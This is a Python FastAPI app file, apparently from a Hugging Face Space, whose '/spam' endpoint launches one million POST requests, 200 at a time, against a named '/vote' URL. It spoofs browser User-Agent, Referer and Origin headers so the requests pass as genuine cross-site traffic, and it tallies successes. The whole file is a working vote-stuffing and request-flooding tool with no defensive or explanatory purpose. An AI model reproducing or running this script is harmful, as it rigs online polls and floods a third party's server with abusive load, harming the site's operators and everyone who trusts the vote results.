test2 / app.py
TornadoAI's picture
test
ecd7f36
Raw
History Blame Contribute Delete
1.64 kB
import asyncio
import time
import aiohttp
from fastapi import FastAPI
TARGET_URL = "https://dontspam.this.superhot.pics/vote"
CONCURRENT_REQUESTS = 200 # Requêtes simultanées
TOTAL_REQUESTS = 1000000
HEADERS = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0",
"Accept": "application/json",
"Referer": "https://america.remy.cam/",
"Origin": "https://america.remy.cam",
"Sec-GPC": "1",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "cross-site",
}
success = 0
failed = 0
async def send_vote(session, semaphore):
global success, failed
async with semaphore:
try:
async with session.post(TARGET_URL, headers=HEADERS, timeout=5) as resp:
if resp.status == 200:
success += 1
else:
failed += 1
except:
failed += 1
if (success + failed) % 1000 == 0:
print(
f"Progress: {success + failed} | Success: {success} | Failed: {failed}"
)
async def main():
semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)
async with aiohttp.ClientSession() as session:
tasks = [send_vote(session, semaphore) for _ in range(TOTAL_REQUESTS)]
await asyncio.gather(*tasks)
app = FastAPI()
@app.get("/spam")
def spam():
start = time.time()
asyncio.run(main())
return {
"Hello": f"\nFini en {time.time() - start:.2f}s | Succès: {success} | Échecs: {failed}"
}
@app.get("/")
def greet_json():
return {"success": success, "failed": failed}